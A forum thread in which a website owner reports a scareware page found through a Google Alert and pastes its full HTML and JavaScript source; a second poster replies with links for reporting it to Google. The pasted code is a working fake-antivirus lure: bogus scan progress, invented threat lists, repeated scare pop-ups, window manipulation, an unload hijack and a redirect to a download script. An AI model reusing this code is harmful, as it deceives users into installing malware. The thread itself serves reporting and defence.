virus script at Google alert
by 2fer
5 months ago

I get Google Alerts for my sites and received one this morning. The alert shows one of my URLs as a cached page at radiolaser98.com at this link:
http://www.google.com/url?sa=X&q=http://radiolaser98.com/theme.php%3Fu%3Ddisney-cufflinks&ct=ga&cd=Ie6scXHvEEM&usg=AFQjCNFWI5OfJjgRsLsLCU6OI3AhMFsuEQ

I right clicked the link and saved the file to take a look at it. It is one of those phony VIRUS ALERT!!!! sites that appears to have found a virus on the visitor’s computer to make them click a link to download a “solution”. Sure enough, if you do a search for “Disney cufflinks” (without the quotes) you will see radiolaser98 in the #7 position on the first page of organic results. Here is the script:

<!DOCTYPE HTML PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html><head>
<title>Computer Folder Scanner</title>
<meta>
<sc ript src="img/jquery.js" type="text/javascript"></sc ript>
<sc ript src="img/jquery-init.js" type="text/javascript"></sc ript>
<sc ript src="img/listfile.js" type="text/javascript"></sc ript>
<sc ript src="img/drugndrop.js" type="text/javascript"></sc ript>
<sc ript>
var pinter;var ss=15;var teracti=0;
function hideWarnDialog()
{
if(confirm(‘We recommend you to download and install antivirus software.’)) {

}
else {
terttye43();
};
};
function terttye43(){
alert(‘Potentially dangerous software. These programs may damage your computer and steal your private information. On-lines scan should install Total Security utilities to fix your pc. Please click OK to download and install Total Security tool.’);
}
function hfgyh54(){};
function qwbewupd()
{
if ($(“.progress_bar_fill”).width()>0)
{
$(“#progress_prcnt”).html((Math.round(100-$(“.progress_bar_fill”).width()/417*100))<ins>“%”);
$(“#gdfgfdgdf”).html(gs[Math.floor(Math.random()gs.length)] );
if ($(“.progress_bar_fill”).width()<350 && teracti==0)
{
document.getElementById(‘threat1’).style.visibility = ‘visible’;
document.getElementById(‘desc’).style.visibility = ‘visible’;
setInterval(“$(‘#tc1’).toggleClass(‘none’)”,1000);
teracti=1;
}
if ($(“.progress_bar_fill”).width()<200 && teracti==1)
{
document.getElementById(‘threat2’).style.visibility = ‘visible’;
setInterval(“$(‘#tc2’).toggleClass(‘none’)”,1000);
teracti=2;
}
if ($(“.progress_bar_fill”).width()<100 && teracti==2)
{
document.getElementById(‘threat3’).style.visibility = ‘visible’;
setInterval(“$(‘#tc3’).toggleClass(‘none’)”,1000);
setInterval(“$(‘#tc4’).toggleClass(‘none’)”,1000);
teracti=3;
}
}
else
{
clearInterval(pinter);
$(“.hdgjfstvtecfc43”).html(“System scanning completed. 34 Potential aggressive items was found!”);
setTimeout(“pop2()”,1000);
}
}
function Minimize()
{
window.innerWidth = 100;
window.innerHeight = 100;
window.screenX = screen.width;
window.screenY = screen.height;
alwaysLowered = true;
}
function Maximize() {window.moveTo(0,0);window.resizeTo( screen.width, screen.height );}
function download() {
window.location=‘/download.php?id=174s1’;
}
function away()
{
w = window;
ua = navigator.userAgent;
v1 = ua.toLowerCase().indexOf(‘msie’) != -1 && ua.toLowerCase().indexOf(‘opera’) < 0;
x = 11;
eval(’w.resizeTo(x
10,x*11-7)‘);
w.moveTo(v1 ? (screen.width – 100) >> 1 : 11027, v1 ? (screen.height – 100) >> 1 : 10659);
}
function pop1() {
confirm(’Warning!!! ’</ins>
‘Your personal computer needs to install antivirus software! Total Security can perform fast and free virus and malicious software scan of your computer .’);
}
function pop2() {
confirm(‘This PC remains infected by spyware. ’+
’They can seriously harm your private data or files, and should be healed immediately.\n\n’+
‘Return to Total Security and download it secure to your PC’);
pop4();
}
function pop3dsds() {
alert(‘This PC is still affected by malware! ’+
’Your mail, passwords and private documents might be in danger, protect your PC immediately.\n\n’+
‘Return to Total Security and download it secure to your PC’);
}
function pop4() {
document.getElementById(‘ap’).style.display = ‘block’;
$(“.left_bar”).css(“display”,“none”);
$(“.left_bar”).css(“display”,“block”);
}
function sp2init(){
}
function loading() {
if (window.attachEvent)
away();
pop1();
Maximize();
window.focus();
}
function loaded() {
$(“#white”).css(“display”,“none”);
$(“#page_progress”).css(“display”,“block”);
$(“.left_bar”).css(“display”,“none”);
$(“.left_bar”).css(“display”,“block”);
$(“.progress_bar_fill”).animate({width:"0px"},ss*1000);
pinter = setInterval(qwbewupd,ss*10);
};
loading();
var exit = true;
var usePopDialog = true;
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = “dialogWidth:1024px; dialogHeight:768px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0; help:0; resizable:1; scroll:1; status:0”;
var popWindowOptions = " scrollbars=1,menubar=1,toolbar=1,location=1,personalbar=1,status=1,resizable=1";
var clid = “7f09c9e1c55f7d63f02909a14c1a45e0”;
var usePopDialog = true;
var isUsingSpecial = false;
dat=new Date(1255866756);
var dlth=dat.getHours()-dat.getUTCHours();
newurl = “/download.php?id=174s1&dlth=”+dlth;
var isXPSP2 = false;
var u = “6BF52A52-394A-11D3-B153-00C04F79FAA6”;
function ext(){
if(exit) {
exit=false;
terttye43();
if(!isXPSP2 && !usePopDialog) {
window.open(popURL,"",popWindowOptions);
}else if(!isXPSP2 && usePopDialog) {
eval(“window.showModalDialog(popURL,’’,popDialogOptions)”);
}else{
iie.launchURL(popURL);
}
}
}
var popURL = newurl;
isUsingSpecial = true;
if (window.attachEvent)
eval(“window.attachEvent(‘onunload’,ext);”);
else
window.addEventListener(“unload”, ext, false);
</sc ript>
<link href="http://badwarebusters.org/interstitial?uri=img%2Fstyle.css" type="text/css" />

</head> <body> <bgsound rel="nofollow" src="http://badwarebusters.org/interstitial?uri=%23">

<DIV id=ap style=“LEFT: 0px; z-index:2; WIDTH: 100%; POSITION: absolute; TOP: 190px; display: none;” align=center>

<input type="button"><spacer height="294" width="446" />

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F007.gif" height="19" width="51">
System Tasks

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F016.gif" height="16" width="14">View system information



<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F017.gif" height="16" width="16"> Add or remove programs


<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F018.gif" height="16" width="16"> Change a settings

Other Places




<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F012.gif" height="16" width="16"> My Network Places


<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F013.gif" height="16" width="16"> My Documents


<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F014.gif" height="14" width="16"> Shared Documents


<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F015.gif" height="16" width="16"> Control Panel

Details



My Computer
System Folder

Your Info
IP: 72.171.0.140
Country:
City:
Personal information could be compromised
System scan progress
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F020.gif" height="18" width="15">11 threats
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F004.gif" height="40" width="43">Shared Documents
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F020.gif" height="18" width="15">23 threats
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F004.gif" height="40" width="43">My Documents
Hard drives
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F020.gif" height="18" width="15">24 threats
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F005.gif" height="40" width="43">Local Disk (C:)
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F020.gif" height="18" width="15">10 threats
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F005.gif" height="40" width="43">Local Disk (D:)
DVD
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F003.gif" height="40" width="43">DVD-RAM Drive (E:)
100%
Now scanning:
Your Computer is Infected!
Threats and actions:
<table> <tbody><tr>
<td width="166">Name</td> <td width="105">Risk level</td> <td width="85">Date</td> <td width="120">Files infected</td> <td width="120">State</td> </tr> <tr> <td><img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F010.gif"> W32/Virut.a!</td> <td><font>Critical</font></td> <td>11.18.2008</td> <td>35</td> <td>Waiting removal</td> </tr> <tr> <td><img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F010.gif"> Exploit-MSWord</td> <td><font>Critical</font></td> <td>11.18.2008</td> <td>35</td> <td>Waiting removal</td> </tr> <tr> <td><img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=img%2F010.gif"> Win 32:Delf-XQ</td> <td><font>Critical</font></td> <td>11.18.2008</td> <td>35</td> <td>Waiting removal</td> </tr> </tbody></table>
Description:
This program is potentially dangerous for your system. Trojan-Downloader stealing passwords, credit cards and other personal information from your computer.

Advice:
You need to remove this threat as soon as possible!
<sc ript src="img/geoip.js"></sc ript>

</body></html>

by Kaleh
5 months ago

I would recommend using the following forms to notify Google’s anti-malware team, as well as the Google Alerts team.

Report Malicious Software
http://www.google.com/safebrowsing/report_badware/

Contact Google Alerts
http://www.google.com/support/alerts/bin/request.py

by 2fer
5 months ago

Thank you for that information, it has been reported. I thought I was reporting it here so your response helped a lot.